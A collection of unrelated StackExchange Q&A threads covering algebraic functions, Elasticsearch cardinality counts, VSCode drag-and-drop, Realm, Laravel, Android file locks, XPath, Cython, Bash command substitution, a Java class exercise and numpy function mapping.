The idea here is similar to the previous paragraph - write $F=\Bbb C(x_1)$, then $f_1,f_2$ are algebraic over $F$, and $g(f_1,f_2)$ is algebraic over $F(f_1,f_2)$ (take the relation $p(x_1,x_2,g(x_1,x_2))$ satisfied by $g$ and plug in for $x_1$ and $x_2$), so the composite extension $F(f_1,f_2,g(f_1,f_2))$ is algebraic over $F$, and thus $g(f_1,f_2)$ satisfies $p(x_1,y)$ via the same construction at the end of the previous paragraph. As for why we can ignore the "badness" of the closure of the graph, all we need is for our function to satisfy the polynomial relation on a dense set: for then $p(x,f(x))$ is a continuous function which is equal to zero on a dense set and thus zero everywhere by continuity. So "bad fibers" appearing infrequently enough don't invalidate our polynomial relation. (As an aside, it's interesting to compare these sorts of proofs to the case of semi-algebraic/definable functions: there, the strategy is to use quantifier elimination to write the projection of $(x,f_1(x),f_2(x),f_1(x)+f_2(x))$ in terms of formulas not involving $f_1$ or $f_2$. So somehow algebraicness here is playing the same role that quantifier elimination plays in those theories.) This is great, as it shows me where my difficulty is. I am actually interested in $Q$-algebraic functions - functions where one can find such a polynomial $P$ with coefficients in $\mathbb{Q}$. For me the $\textbf{height}$ of such a function is the height of the algebraic set $\{P=0\}$. I really want to show that the sum/composition of $Q$-algebraic functions is $Q$-algebraic, which follows from your remarks. I also want to bound the height of the sum/composition, and unfortunately I can't see right now how to do that; here the badness does make it difficult for me. Unfortunately, I don't really have much to add on the height front - you may wish to ask a new question dealing with that specific issue. Actually, I see an issue with your proof, for the composition part. 
It may well be that the polynomial $p(f_1,f_2,g(f_1,f_2))$ is the zero polynomial, if the coefficients of $p$ happen to be relations of $f_1,f_2$. I don't see a reason why this can't happen if they are composable. For instance if $f_1=f_2=0$ and $g=x/(1-\sqrt{1+y})$, then $p(f_1,f_2,g)$ is redundant. Still, of course the composition is algebraic, being just a constant function.

I'll see what I can think of. In the meantime, that's not composable, so you may wish to adjust your example.

Why isn't it composable? The branch where $\sqrt{1+0}=1$ is problematic at this point, but if you go around $y=-1$ you reach the branch where $\sqrt{1+0}=-1$, and there you get a nice function defined in a neighborhood of $(0,0)$.

What do you think about this argument: Say $P(x_1,x_2,y)=a_d(x_1,x_2)y^{d}+\dots+a_0(x_1,x_2)$. Substitute $x_1=f_1$, $x_2=f_2+\epsilon$, and $y=g(x_1,x_2)$. Now for each $i$ we have $a_i(f_1,f_2+\epsilon)=\epsilon^{k_i}b_i(\epsilon)$ where $b_i$ has coefficients in $\mathbb{C}(x,f_1,f_2)$ and $b_i(0)\neq 0$. By dividing by the smallest power of $\epsilon$ and setting $\epsilon=0$ we get the required relation for $g(f_1,f_2)$. My only issue is that the range of $(f_1,f_2+\epsilon)$ may escape the domain of $g$, but maybe this issue can be solved?
common-pile/stackexchange_filtered
Elasticsearch counts don't add up after using aggregation

I have an ES index, and I want to count the number of distinct CONTACT_IDs whose [Have Agreement] flag is Y and those whose flag is N. The flag is unique for each CONTACT. However, when I add the count for the Y flag and the count for the N flag, the total is different from the total CONTACT count.

1. Total distinct CONTACT_ID count:

POST /dashboard/_search?size=0
{
  "query": {
    "bool": {
      "must": [
        { "range": { "CREATED": { "gte": "2021-07-04T00:00:00.001Z", "lte": "2021-12-31T00:00:00.001Z" } } }
      ]
    }
  },
  "aggs": {
    "UniqueContact": { "cardinality": { "field": "CONTACT_ID.keyword" } }
  }
}

The result is 27588.

2. Distinct CONTACT_ID count for the Y and N flags respectively:

POST /dashboard/_search?size=0
{
  "query": {
    "bool": {
      "must": [
        { "range": { "CREATED": { "gte": "2021-07-04T00:00:00.001Z", "lte": "2021-12-31T00:00:00.001Z" } } }
      ]
    }
  },
  "aggs": {
    "CVID": {
      "terms": { "field": "Have Agreement.keyword", "order": { "type_count": "desc" } },
      "aggs": { "type_count": { "cardinality": { "field": "CONTACT_ID.keyword" } } }
    }
  }
}

The results are 2692 and 2158, which add up to 4850.

3. Evidence that shows the flag is unique for each contact:

POST /dashboard/_search?size=0
{
  "query": {
    "bool": {
      "must": [
        { "range": { "CREATED": { "gte": "2021-07-04T00:00:00.001Z", "lte": "2021-12-31T00:00:00.001Z" } } }
      ]
    }
  },
  "aggs": {
    "CVID": {
      "terms": { "field": "CONTACT_ID.keyword", "order": { "type_count": "desc" } },
      "aggs": { "type_count": { "cardinality": { "field": "Have Agreement.keyword" } } }
    }
  }
}

Results seem to be coherent, according to your example.
Keep in mind that cardinality is an approximation (you can raise its precision_threshold to gain some precision): https://www.elastic.co/guide/en/elasticsearch/reference/current/search-aggregations-metrics-cardinality-aggregation.html

You have around 27588 distinct uniqueContact matching your query (cardinality is around 5% precision). Top aggregation by Y or N (Have Agreement.keyword): in the result we can read 16725 documents with N and 11190 documents with Y. For the N group, you have around 2692 different uniqueContact; for the Y group, around 2158.

So you have "duplicate" matching documents; we can see this in your 3) part: 10 docs with the 3-QV3ZBW uniqueContact, 10 docs with the 3-QV3ZC3 uniqueContact. => So your second request is correct: you have around 2692 distinct uniqueContact with the N value (2158 for Y). The 2692 uniqueContact are present in 16725 docs; the 2158 others refer to the 11190. 16725 + 11190 documents together cover the 27588 (± 5%) distinct contacts.

PS: Add a query term on 3-QV3ZBW, for example; I think this will answer your question with a simple example.

Thanks. I set the precision to the maximum (40000), and the result is coherent now. My data is way above that number if I remove the filter though, so it looks like I don't have other options here? @LeBigCat
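For reference, the precision fix the asker describes can be written like this (a sketch reusing the field names from the question; per the Elasticsearch docs, precision_threshold is capped at 40000, below which counts are close to exact and above which they fall back to HyperLogLog++ approximation):

```json
{
  "size": 0,
  "aggs": {
    "UniqueContact": {
      "cardinality": {
        "field": "CONTACT_ID.keyword",
        "precision_threshold": 40000
      }
    }
  }
}
```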
common-pile/stackexchange_filtered
How to drag a treeview item and drop it into a Jupyter notebook editor in a VSCode extension?

I'm considering creating a VSCode extension for our project. I ran into some issues when I tried to implement dragging a treeview item and dropping it into the editor. First, I implemented a MyTreeDataProvider class:

class MyTreeDataProvider implements vscode.TreeDataProvider<DataType>, vscode.TreeDragAndDropController<DataType> {
    dropMimeTypes = ['application/vnd.code.tree.mytree', 'text/uri-list'];
    dragMimeTypes = ['application/vnd.code.tree.mytree'];
    ...
    public async handleDrag(
        source: DataType[],
        dataTransfer: vscode.DataTransfer,
        token: vscode.CancellationToken
    ): Promise<void> {
        dataTransfer.set('application/vnd.code.tree.mytree', new vscode.DataTransferItem('placeholder'));
    }
}

Then I want to drop it into a Jupyter notebook, so I did this:

class FileDropProvider implements vscode.DocumentDropEditProvider {
    async provideDocumentDropEdits(
        _document: vscode.TextDocument,
        position: vscode.Position,
        dataTransfer: vscode.DataTransfer,
        token: vscode.CancellationToken
    ): Promise<vscode.DocumentDropEdit | undefined> {
        const dataTransferItem = dataTransfer.get('application/vnd.code.tree.mytree');
        if (!dataTransferItem) {
            return undefined;
        }
        ...
        snippet.appendText('placeholder from drag\n');
        return { insertText: snippet };
    }
}

export function registerDropProvider(context: vscode.ExtensionContext) {
    const selector: vscode.DocumentSelector = { notebookType: 'jupyter-notebook', scheme: 'file' };
    context.subscriptions.push(vscode.languages.registerDocumentDropEditProvider(selector, new FileDropProvider()));
}

In FileDropProvider, I can't read what I set in the drag function; a default value is used instead. I don't know what I did wrong, or whether VS Code supports drag-and-drop this way. Does anyone know about this?

vscode package version: 1.70.0, Windows 11. I want to drag a treeview item and drop it into a Jupyter notebook.
In the handleDrag function, I couldn't set a message into the dataTransfer. When dropped into the editor, only the default URI is printed. Do you know how to implement this function?

The code sample looks correct, but there were two VS Code bugs that caused it not to work: https://github.com/microsoft/vscode/issues/175589 — tree drag operations were not updating the DataTransfer of the internal drag event; https://github.com/microsoft/vscode/issues/175579 — data transfer value lookups should be case-insensitive. Both should be fixed in VS Code 1.78.

Were you able to get these working? I'm working on adding some drag-and-drop functionality to an extension, and it looks like I'm getting a very similar situation to what you described above. The dataTransfer.get('...') returns an ID, but an empty string for the value. Did you test in VS Code Insiders (1.78)?

No, I'm using the release version 1.77, since it was mentioned in the above answer that it should be fixed in 1.77. Is the fix not actually implemented yet in 1.77?

That would certainly explain it! The comment was out of date. https://github.com/microsoft/vscode/issues/175589 is in the April 2023 milestone, so 1.78.

Awesome, will test with the Insiders build later on then. Thanks! Works like a charm in the Insiders build. ⭐
common-pile/stackexchange_filtered
How to share a Realm Results<T> with another view?

How do I properly share a Realm Results object with another view?

final class Transaction: Object, ObjectKeyIdentifiable {
    @Persisted(primaryKey: true) var _id: ObjectId
    @Persisted var buyCurrency = ""
    @Persisted var buyAmount = 0
}

struct TransactionView: View {
    @ObservedResults(Transaction.self) var transactions
    var body: some View {
        EditView(transactions: transactions)
    }
}

import SwiftUI
import RealmSwift

struct EditView: View {
    @ObservedRealmObject var transactions: Results<Transaction>
    var body: some View {
        ...
    }
}

I'm getting this compilation error: Generic struct 'ObservedRealmObject' requires that 'Results<Transaction>' conform to 'ObservableObject'

You need to use @ObservedResults (as in TransactionView) rather than @ObservedRealmObject, which is meant for a single Realm object.

You are right. I'm dumb :D
common-pile/stackexchange_filtered
Laravel 5.7 - Get all users from the current user's groups

This is the structure that I currently use.

Model User:

class User extends Authenticatable implements MustVerifyEmail
{
    public function groups()
    {
        return $this->belongsToMany('App\Group')->withTimestamps();
    }
}

Model Group:

class Group extends Model
{
    public function users()
    {
        return $this->belongsToMany('App\User')->withTimestamps();
    }
}

Pivot table:

Schema::create('group_user', function (Blueprint $table) {
    $table->integer('group_id');
    $table->integer('user_id');
    $table->integer('role_id')->nullable();
    $table->timestamps();
});

I would like to get all the users who are in the same groups as the current user, without returning duplicate users (a user can be in multiple groups). The ideal functions would be:

$user->contacts() // Returns an object with the (unique) contacts from all of the current user's groups

AND

$user->groupContacts($group) // Which is the same as $group->users // Returns an object with all the users of the given group

Here is the non-functional function I'm working on (Model User.php):

public function contacts()
{
    $groups = $this->groups;
    $contacts = new \stdClass();
    foreach ($groups as $key => $group) :
        $contacts->$key = $group->users;
    endforeach;
    return $contacts;
}

I'm really not an expert with table structures, so if there is a better way to do this, I'm open to it. I'm only at the beginning of this personal project, so nothing is written in stone.

Optional stuff: exclude the current user from the list; include roles from the pivot table; support soft deletes.

You can try something like this on your User model:

public function contacts()
{
    // Get all groups of the current user
    $groups = $this->groups()->pluck('group_id', 'group_id');

    // Get a collection of all users in the same groups
    return $this->getContactsOfGroups($groups);
}

public function groupContacts($group)
{
    // Get a collection of the contacts of the same group
    return $this->getContactsOfGroups($group);
}

public function getContactsOfGroups($groups)
{
    $groups = is_array($groups) ? $groups : [$groups];

    // This will return a collection of Users that belong to $groups
    return \App\User::whereHas('groups', function($query) use($groups) {
        $query->whereIn('group_id', $groups);
    })->get();
}
common-pile/stackexchange_filtered
Lock file for writing in Android

I am storing some data in a file on the SD card and reading the same file from a different thread. To avoid a race condition between reading and writing, I want to lock the file in both scenarios (reading and writing). I have two options in mind: 1) I can do this using synchronization; 2) I can do this using a file lock. Which one should I choose, and why? Which one is more memory efficient? I know the synchronization approach, but I don't know how to use a file lock, so can anyone show me the code for using a file lock?

I tried with a file lock but it is not working in Android; please have a look at the code. Any help is appreciated.

File syncDatafile = new File(file, "sync.txt");
FileInputStream fileInputStream = new FileInputStream(syncDatafile);
java.nio.channels.FileLock lock = fileInputStream.getChannel().lock();
try {
    FileWriter writer = new FileWriter(syncDatafile, true);
    writer.write(data);
    writer.flush();
    writer.close();
} catch (Exception ex) {
    ex.printStackTrace();
} finally {
    lock.release();
    fileInputStream.close();
}

I am sorry guys, it was my mistake: I was using a FileInputStream, which is for reading a file. I am so sorry; now it's fixed:

File syncDatafile = new File(file, "sync.txt");
FileOutputStream fileOutputStream = new FileOutputStream(syncDatafile);
java.nio.channels.FileLock lock = fileOutputStream.getChannel().lock();
try {
    FileWriter writer = new FileWriter(syncDatafile, true);
    writer.write(data);
    writer.flush();
    writer.close();
} catch (Exception ex) {
    ex.printStackTrace();
} finally {
    lock.release();
    fileOutputStream.close();
}

I wonder whether it actually worked? Because the FileLock documentation says: "File locks are held on behalf of the entire Java virtual machine. They are not suitable for controlling access to a file by multiple threads within the same virtual machine." This implies that this should not work.
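Since the last comment's point is that FileLock is process-level, readers and writers inside the same app need a JVM-level lock instead. Here is a minimal sketch (plain Java, not Android-specific; the class name and file path are illustrative) serializing appends to a shared file with a ReentrantLock:

```java
import java.io.FileWriter;
import java.io.IOException;
import java.util.concurrent.locks.ReentrantLock;

class SafeFileAppender {
    private final ReentrantLock lock = new ReentrantLock();
    private final String path;

    SafeFileAppender(String path) {
        this.path = path;
    }

    // Serializes writes from any thread in this JVM,
    // which a FileLock cannot do (it is per-process).
    void append(String data) throws IOException {
        lock.lock();
        try (FileWriter writer = new FileWriter(path, true)) {
            writer.write(data);
        } finally {
            lock.unlock();
        }
    }
}
```

A reader would take the same lock before opening the file, so reads never observe a half-written record.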
common-pile/stackexchange_filtered
XPath: getting specific siblings

I'm writing a Google App Engine project in Python. I need to scrape the banks' sites and get the exchange rates from them. An example of the HTML:

<tr>
  <td width="2"><img src="./images/zero.gif" width="2" height="2" border="0" /></td>
  <td width="41" class="curvalsh" align="left" valign="middle"><font color="#DC241F">USD</font></td>
  <td width="41" class="curvalsh" align="right" valign="middle"><b> 15.20 </b></td>
  <td width="4" align="left" valign="middle"><img src="./images/zero.gif" width="2" height="20" border="0" hspace="1"></td>
  <td width="41" class="curvalsh" align="right" valign="middle"><b> 16.00 </b></td>
  <td width="4" align="left" valign="middle"><img src="./images/zero.gif" width="2" height="20" border="0" hspace="1"></td>
  <td width="41" class="curvalsh" align="right" valign="middle"> - </td>
  <td width="2" align="left" valign="middle"><img src="./images/zero.gif" width="2" height="20" border="0" hspace="1"></td>
</tr>

I need to get the next two tags with text after the tag containing the "USD" text (the tags with 15.20 and 16.00). What I've already done is:

xpath = "//tr/td[text()='USD']/following-sibling::td/text()"

But this doesn't return anything, and it is not exactly what I need, because I have to specify getting the 2 tags containing text after the "USD" tag, since there are also tags which don't contain any text.

EDIT: I've also tried this, which still returns nothing:

xpath = "//tr/td[text()='USD']/following-sibling::td[matches(text(),'(^|\W)[0-9]+.[0-9]+($|\W)','i')]/text()"

Notice that there is another tag (a <font>) inside the td before getting to the searched text, so you can either search it directly:

//tr/td/font[text()='USD']......

or

//tr//font[text()="USD"]......

In any case you will then go one level up using .., much like when browsing the file system.
Well, and there is another tag (<b>) hiding there too, which you can refer to directly using b/text(), or you can take all the text under the next sibling with //text(). This is how it might look:

//tr/td/font[text()='USD']/../following-sibling::td/b/text()

This works for me, thanks! And is it possible to ignore some inner tags (<font>, <b>, etc.), i.e. to write a kind of universal XPath expression? The problem is that I need to scrape about 30 sites like this, so I'd rather not write a separate XPath expression for each of them.

As said: either / with all tags, or // which will skip tags in between; you can also use * for any tag. No other magic...
common-pile/stackexchange_filtered
Per-unit calculation

I DON'T WANT THE SOLUTION. (The question, the given answer, and my own attempt are attached as images.) I am only confused about why he didn't take the three-phase value the way I did.

I believe there is a mistake in the writing from the author. When dealing with balanced three-phase systems, unless specified otherwise, the given voltage and current values are all line values. Therefore, the square root of 3 must be in the denominator.
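As a reminder of where that square root of 3 comes from, these are the standard per-unit base relations for a balanced three-phase system (not taken from the attached images):

```latex
S_{3\phi} = \sqrt{3}\, V_{LL}\, I_L
\quad\Longrightarrow\quad
I_{base} = \frac{S_{base}}{\sqrt{3}\, V_{LL,base}},
\qquad
Z_{base} = \frac{V_{LL,base}^{\,2}}{S_{base}}.
```

With line-to-line voltage and line current as the given quantities, the current base must carry the $\sqrt{3}$ in its denominator, which is exactly the point of the answer above.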
common-pile/stackexchange_filtered
Cython: efficient custom numpy 1D array for a cdef class

Say we have a class in Cython that wraps (via a pointer) a C++ class of unknown/variable size in memory:

// poly.h
class Poly {
  public:
    std::vector<int> v;
    // [...] Methods to initialize/add/multiply/... coefficients [...] e.g.:
    Poly(int len, int val) { for (int i = 0; i < len; i++) { this->v.push_back(val); } }
    void add(Poly& p) { for (int i = 0; i < this->v.size(); i++) { this->v[i] += p.v[i]; } }
};

We can conveniently expose operations like add in PyPoly using operator overloads (e.g., __add__/__iadd__):

# pywrapper.pyx
from cython.operator cimport dereference as deref

cdef extern from "poly.h":
    cdef cppclass Poly:
        Poly(int len, int val)
        void add(Poly& p)
        int size()

cdef class PyPoly:
    cdef Poly* c_poly

    def __cinit__(self, int l, int val):
        self.c_poly = new Poly(l, val)

    def __dealloc__(self):
        del self.c_poly

    def __add__(self, PyPoly other):
        new_poly = PyPoly(self.c_poly.size(), 0)
        new_poly.c_poly.add(deref(self.c_poly))
        new_poly.c_poly.add(deref(other.c_poly))
        return new_poly

How do I create an efficient 1D numpy array with this cdef class? The naive way I'm using so far involves an np.ndarray of type object, which benefits from the existing operator overloads:

pypoly_arr = np.array([PyPoly(10, val) for val in range(10)])
pypoly_sum = np.sum(pypoly_arr)  # Works thanks to the implemented PyPoly.__add__

However, the above solution has to go through Python code to understand the data type and the proper way to deal with __add__, which becomes quite cumbersome for big array sizes. Inspired by https://stackoverflow.com/a/45150611/9670056, I tried with an array wrapper of my own, but I'm not sure how to create a vector[PyPoly], or whether I should instead just hold a vector of borrowed references vector[Poly*], so that the call to np.sum could be treated (and parallelized) at the C++ level. Any help/suggestions will be highly appreciated! (Especially to rework the question/examples to make them as generic as possible & runnable.)

It is not possible to do that in Cython.
Indeed, Numpy does not support native Cython classes as a data type. The reason is that the Numpy code is written in C and is already compiled by the time your Cython code is compiled. This means Numpy cannot directly use your native type. It has to do an indirection, and this indirection is made possible through the object CPython type, which has the downside of being slow (mainly because of the actual indirection, but also a bit because of CPython interpreter overheads). Cython does not reimplement Numpy primitives, as that would be a huge amount of work. Numpy only supports a restricted, predefined set of data types. It supports custom user types, but such types are not as powerful as CPython classes (e.g., you cannot reimplement custom operators on items like you did).

Just-in-time (JIT) compiler modules like Numba can theoretically support this because they reimplement Numpy and generate code at runtime. However, the support of JIT classes in Numba is experimental, and AFAIK arrays of JIT classes are not yet supported.

Note that you do not need to build an array in this case. A basic loop is faster and uses less memory. Something (untested) like:

cdef int val
cdef PyPoly pypoly_sum

pypoly_sum = PyPoly(10, 0)
for val in range(1, 10):
    pypoly_sum += PyPoly(10, val)
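The object-dtype indirection the answer describes is easy to see in plain Python (a hedged stand-in for the Cython class, since the real PyPoly needs the C++ header to compile): every element-wise addition dispatches through __add__ on each pair, which is exactly the per-element overhead an object-dtype np.sum pays.

```python
class Poly:
    """Pure-Python stand-in for the PyPoly wrapper (illustrative only)."""

    def __init__(self, length, val):
        self.v = [val] * length

    def __add__(self, other):
        # One interpreter-level dispatch and one temporary Poly per addition:
        # this is the cost np.sum incurs on every element of an object array.
        out = Poly(len(self.v), 0)
        out.v = [a + b for a, b in zip(self.v, other.v)]
        return out

polys = [Poly(10, val) for val in range(10)]
total = sum(polys, Poly(10, 0))
print(total.v)  # each coefficient is 0+1+...+9 = 45
```

A native numpy dtype (or the C++-level loop the asker wants) avoids exactly these per-element dispatches.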
common-pile/stackexchange_filtered
Classic VM migration to Resource Manager in Azure

I am looking to migrate my existing classic Azure VM to a Resource Manager VM. Is there any tool available to do that? Or help me by providing a suitable link for doing the same.

All it takes is 10 seconds of googling: https://docs.microsoft.com/en-us/azure/virtual-machines/windows/migration-classic-resource-manager-overview

I have already gone through this link, but it's useless, only theory. However, I am looking for a tool. @BrunoFaria

Check the next steps in that link. All you need is PowerShell.
common-pile/stackexchange_filtered
Why is this WordPress page non-responsive?

The site I am referring to isn't showing up properly on the mobile side. Here is a look at the fiddle: <div id="contactWrapper">. In regards to the actual contact form, the one you will see in JSFiddle shows the shortcode; please refer to the site to see the actual Contact Form 7 form I am referring to. The contact page shows up excellently in the desktop version, but the mobile side isn't working in a responsive format. I am seeking some insight to help me solve this problem. If you have a few minutes to take a look at the problem and give your input, that would be appreciated.

Tested the website with my good ol' Sony Xperia, looks fine, the contact form is working; what exactly is the problem? @bodi0 - the form needs to move to the left a bit; it's not centered, but only on the mobile side.

Your problem: #contact2 and #contact1 have pixel sizes:

#contact1 {
    display: table-cell;
    width: 380px;
    float: left;
    margin-top: 20px;
}

#contact2 {
    display: table-cell;
    width: 670px;
    float: left;
}

Replace them with:

#contact1 {
    display: table-cell;
    width: 30%;
    float: left;
    margin-top: 20px;
}

#contact2 {
    display: table-cell;
    width: 70%;
    float: left;
}

This didn't work. The form is there; it actually needs to move to the left, but only on the mobile side.
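For completeness, a common way to center such floated blocks only on small screens is a media query. This is a sketch using the selectors from the thread, with an assumed breakpoint; it is not a confirmed fix for this particular theme:

```css
/* On narrow viewports, stop floating and let each block span the full
   width, centered. Selectors taken from the thread; 600px is assumed. */
@media (max-width: 600px) {
  #contact1,
  #contact2 {
    float: none;
    width: 100%;
    margin: 0 auto;
  }
}
```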
common-pile/stackexchange_filtered
video.js module: experiencing an error message after install

I am using Drupal 8 and attempting to set up the Video.js module. The readme file needs work, so it's hard to know where I went wrong. Here is what I've done so far: installed the module using Composer; went to the Video.js GitHub, downloaded the JS, and placed it in the Drupal 8 libraries folder at the path libraries/video-js/video.js (not what's listed in the readme file, since that said sites/all/libraries, which is a D7 location); added Video.js to my content type's field settings. I receive this error message overlaid on the video player: "No compatible source was found for this video." The video was shot with an iPhone 8 and uploaded using the video module field.

What extension is your video file? Dot what? .mov, shot from my iPhone 8.

I'm voting to close this question because it's a bug report or support request for a third-party dependency hosted on drupal.org or elsewhere, and therefore must be reported there to track issues in a single place, not on Drupal Answers.

Try with a .mp4 file and see what happens.

To @leymanmx: just because I can't get it working doesn't mean it's a bug. This is a common error, and it's usually caused by a setup problem, not a bug. And no, sssweat, same issue with .mp4. I'm also looking for maximum compatibility, so users can upload most standard format types and be successful.

Check if the video file exists somewhere inside the /sites/default/files folder. You could possibly have a permission issue that is not allowing Drupal to write to the /files folder.

@nosssweat the files are being written to that directory, and if I select the autoplay option the video plays. But while playing, there's still the error written on top of the video, with a big X as well.
common-pile/stackexchange_filtered
Linux bash script: variable as command output

I have to create a script on RHEL and was wondering if I am able to save the output of a command as a variable. For example:

4.2.2 Ensure logging is configured (Not Scored) : = OUTPUT (which comes from the command sudo cat /etc/rsyslog.conf)

This is what I have now:

echo " ### 4.2.2 Ensure logging is configured (Not Scored) : ### "
echo " "
echo "Running command: "
echo "#sudo cat /etc/rsyslog.conf"
echo " "
sudo cat /etc/rsyslog.conf

Thank you!

@user14135159: Please clarify: do you mean the standard output of a command, or stdout+stderr?

Here is an example:

MESSAGE=$(echo "Hello!")
echo $MESSAGE
Hello!

Or the old standard:

MESSAGE=`echo "Hello!"`
echo $MESSAGE
Hello!

In your case:

FILE_CONTENT=$(cat /etc/rsyslog.conf)

NOTE!!! It is very important not to put spaces around the equals sign! This form is incorrect:

MESSAGE = `echo "Hello!"`
MESSAGE: command not found

It is good to explain that what you are doing (and what the OP is looking for) is called command substitution, where the output of a command is substituted in place of the command for assignment to a variable. (I know you know, but the OP may not; it always helps if they want to search further.) Good note that $(...) is preferred over the older `...` form.

Thank you for the explanation! Really appreciate it :)

echo $MESSAGE is buggy. See "I just assigned a variable, but echo $variable shows something different!"

variable=$(command)
variable=$(command [option…] argument1 arguments2 …)
variable=$(/path/to/command)

Taken from https://linuxhint.com/bash_command_output_variable/

command is the name of a specific command built into the shell. It should not be used as a stand-in for other commands. @CharlesDuffy What does command do? Simply execute? By default, it forces an external command to be used instead of an alias or function for a single execution. Add the -v option and it behaves like a built-in version of which.
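The pieces above combine into a short, testable pattern: capture with $(...), no spaces around the equals sign, and quote the expansion when printing (as the last comments recommend):

```shell
# Command substitution captures the command's stdout; note no spaces around '='.
greeting=$(echo "Hello!")
# Quote the expansion so whitespace and glob characters survive intact.
echo "$greeting"
```

In the asker's script, the same pattern would be `file_content=$(sudo cat /etc/rsyslog.conf)` followed by `echo "$file_content"`.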
common-pile/stackexchange_filtered
Trouble adding an object via the constructor

For a school project we are supposed to create a simple program that takes some input from the user about dogs (name, breed, age and weight) and puts them into an ArrayList. Everything seems to be working, but to test the program I want to add some dogs in my method setUp() so that you can test the functions without having to add a new dog every time, which is where I'm lost! If I write the constructor call (Dog Dog = new Dog("Alex", "Pug", 10, 10.0)) in setUp(), I get the error message: "The value of the local variable Dog is not used". I've tried to put the constructor call in case "1" as well; then I don't get any errors, but the dog is not added to the ArrayList, while I can add new dogs inside the program. I'm really clueless what to do next. The dog needs to be added via the Dog constructor for the assignment (parts of the code are cropped for relevance; don't worry about imports or main).

class DogReg {
    private ArrayList<Dog> allDogs = new ArrayList<Dog>();
    private Scanner keyboard = new Scanner(System.in);

    private void setUp() {
        System.out.print("Hi! Welcome to the Dog register! \n" + "Choose an option between 1-5\n");
        System.out.println("1. Register your dog");
        System.out.println("2. Increase age");
        System.out.println("3. List");
        System.out.println("4. Delete");
        System.out.println("5. Exit");
    }

    private void runCommandLoop() {
        // Initializes a while loop that runs as long as willRun == true
        boolean willRun = true;
        while (willRun == true) {
            System.out.print("> ");
            // Creates a variable that converts the input string to lowercase
            String command = keyboard.next();
            switch (command) {
                case "1":
                    // Constructs a new dog for the ArrayList
                    Dog Dog = new Dog();
                    // Saves all input to the ArrayList
                    System.out.print("\nThe name of the dog: ");
                    Dog.setName(keyboard.next());
                    System.out.print("The breed of the dog: ");
                    Dog.setBreed(keyboard.next());
                    System.out.print("The age of the dog: ");
                    int age = keyboard.nextInt();
                    Dog.setAge(age);
                    System.out.print("The weight of the dog: ");
                    double weight = keyboard.nextDouble();
                    Dog.setWeight(weight);
                    allDogs.add(Dog);
                    break;

class Dog {
    private String name;
    private String breed;
    private int age;
    private double weight;

    public Dog(String name, String breed, int age, double weight) {
        this.name = name;
        this.breed = breed;
        this.age = age;
        this.weight = weight;
    }

    public String getName() { return name; }
    public String getBreed() { return breed; }
    public int getAge() { return age; }
    public double getWeight() { return weight; }
    public void setName(String name) { this.name = name; }
    public void setBreed(String breed) { this.breed = breed; }
    public void setAge(int age) { this.age = age; }

I can add a dog in setUp() if I'm using this code instead, but we're not supposed to use that:

Dog Dog = new Dog();
Dog.setName("Bosse");
Dog.setBreed("Mops");
int age = 10;
Dog.setAge(age);
double weight = 10;
Dog.setWeight(weight);
allDogs.add(Dog);

Hope it's clear enough; I apologize for grammar and/or spelling, English is not my first language.

I didn't thoroughly read your code, but one thing: Dog Dog = new Dog(); - avoid such naming at all costs, it will eventually confuse you and introduce bugs. Try to stick to the Java naming conventions, which state that variable names should start with a lower-case letter, i.e. Dog dog = new Dog();.
- Think about what happens at this line: Dog.setName(keyboard.next()); - what's Dog here? Is it the class or the variable you're referring to? The compiler just can't know, and you probably won't either when reading your code again sometime later.

You should respect the Java naming convention: Dog dog = new Dog();

If you ask about an error caused by some code, post the exact and complete error message, and post the code causing the error, not some other code.

Name your Dog variable something different. You're naming your variable the same thing as the name of the class, and it's confusing the compiler. Try this, for example:

Dog newDog = new Dog();
newDog.setName("Bosse");
newDog.setBreed("Mops");
int age = 10;
newDog.setAge(age);
double weight = 10;
newDog.setWeight(weight);
allDogs.add(newDog);

Thanks for your comment, it did help! @zkulltrail make sure you upvote answers you find helpful, and if my answer solved your problem, you can click the checkmark to accept it. Welcome to the site!

Follow-up question: I want a constructor that is empty for my case "1" (where I add more dogs), but it feels cheap just to leave it completely blank; is there another way to do it? Edit: I'm talking about:

public DogArr() {
}

There's nothing inherently wrong with using an empty constructor, but you could consider gathering all of the data from the user into variables and putting those into your Dog constructor.
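Putting the two answers together, the test data the asker wanted in setUp() can use the parameterized constructor with conventionally-named variables. A sketch, using a minimal illustrative copy of the question's Dog class so it stands alone:

```java
import java.util.ArrayList;

// Minimal Dog matching the question's fields (illustrative copy).
class Dog {
    private final String name;
    private final String breed;
    private final int age;
    private final double weight;

    Dog(String name, String breed, int age, double weight) {
        this.name = name;
        this.breed = breed;
        this.age = age;
        this.weight = weight;
    }

    String getName() { return name; }
}

class DogDemo {
    // Pre-populates the list the way setUp() could: the four-argument
    // constructor, and variable names distinct from the class name.
    static ArrayList<Dog> seedDogs() {
        ArrayList<Dog> dogs = new ArrayList<>();
        dogs.add(new Dog("Alex", "Pug", 10, 10.0));
        dogs.add(new Dog("Bosse", "Mops", 10, 10.0));
        return dogs;
    }
}
```

Because each Dog is added to the list immediately, no "local variable is not used" warning appears, and no setters are needed.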
common-pile/stackexchange_filtered
In Python, what's the most efficient way to apply a function to a list?

My actual data is huge and quite heavy. But to simplify, say I have a list of numbers x = [1,3,45,45,56,545,67] and I have a function that performs some action on these numbers:

def sumnum(x): return(x=np.sqrt(x)+1)

What's the best way to apply this function to the list? I don't want to use a for loop. Would map be the best option, or is there anything faster/more efficient than that? Thanks, Prasad

That function isn't valid syntax.

How you're applying the function will probably be the smallest part of your problem; it'll most certainly depend on the structure of the data and how you're able to stream it to memory, either by handling each element by itself or by batching it up. You'll simply have to try; there isn't an answer that fits every use case.

What's wrong with return np.sqrt(x)+1?

map, for loops, list comprehensions: they will all be in the same ballpark of performance. You aren't getting around looping. Why don't you just want to use a loop? I would have thought loops would be more inefficient for heavy data..?

In standard Python, the map function is probably the easiest way to apply a function to an array (not sure about efficiency though). However, if your array is huge, as you mentioned, you may want to look into using numpy.vectorize, which is very similar to Python's built-in map function.

Edit: A possible code sample:

vsumnum = np.vectorize(sumnum)
x = vsumnum(x)

The first function call returns a function which is vectorized, meaning that numpy has prepared it to be mapped to your array, and the second function call actually applies the function to your array and returns the resulting array.
Taken from the docs, this method is provided for convenience, not efficiency, and is basically the same as a for loop.

Edit 2: As @Ch3steR mentioned, numpy also allows for element-wise operations on arrays, so in this case, because you are doing simple operations, you can just do np.sqrt(x) + 1, which will add 1 to the square root of each element. Functions like map and numpy.vectorize are better for when you have more complicated operations to apply to an array.

Thanks @awarrier99, I will have a look. Although I increasingly feel map might be more suitable for my problem, it's good to know about the numpy.vectorize function as well!

